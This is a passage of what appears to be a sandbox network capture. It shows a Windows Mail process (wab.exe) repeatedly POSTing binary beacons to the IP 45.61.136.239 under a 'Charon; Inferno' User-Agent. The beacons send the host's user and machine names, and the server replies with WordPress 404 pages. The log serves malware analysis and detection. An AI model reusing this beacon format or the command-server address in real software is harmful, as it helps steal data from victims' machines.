                  Jul 3, 2024 09:42:26.183507919 CEST448INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:42:26.183541059 CEST1236INData Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26
                  Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
                  Jul 3, 2024 09:42:26.183576107 CEST224INData Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d
                  Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;w
                  Jul 3, 2024 09:42:26.183605909 CEST1236INData Raw: 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70
                  Data Ascii: idth: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://45.61.136.239/wp-includ
                  Jul 3, 2024 09:42:26.183641911 CEST224INData Raw: 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d
                  Data Ascii: ,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-q
                  Jul 3, 2024 09:42:26.183698893 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:42:26.183732033 CEST1236INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
                  Jul 3, 2024 09:42:26.183763981 CEST1236INData Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30
                  Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.74971645.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:26.580101967 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:26.585206032 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:30.192106962 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:42:27 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:30.192171097 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:42:30.192207098 CEST448INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:42:30.192241907 CEST1236INData Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26
                  Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
                  Jul 3, 2024 09:42:30.192276955 CEST1236INData Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d
                  Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
                  Jul 3, 2024 09:42:30.192329884 CEST448INData Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61
                  Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.74971745.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:30.345716000 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:30.352363110 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:34.042824984 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:42:30 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:34.042851925 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:42:34.042867899 CEST448INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:42:34.042886019 CEST1236INData Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26
                  Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
                  Jul 3, 2024 09:42:34.042902946 CEST1236INData Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d
                  Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
                  Jul 3, 2024 09:42:34.042917967 CEST448INData Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61
                  Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot
                  Jul 3, 2024 09:42:34.043018103 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:42:34.043036938 CEST224INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1
                  Jul 3, 2024 09:42:34.043054104 CEST1236INData Raw: 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73
                  Data Ascii: .25em 2.375em}</style><style id='classic-theme-styles-inline-css' type='text/css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;paddin
                  Jul 3, 2024 09:42:34.043067932 CEST224INData Raw: 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c
                  Data Ascii: --gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.74971845.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:34.194433928 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:34.199369907 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:37.323014021 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:42:34 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:37.323112965 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:42:37.323129892 CEST1236INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:42:37.323147058 CEST1236INData Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72
                  Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
                  Jul 3, 2024 09:42:37.323163033 CEST896INData Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65
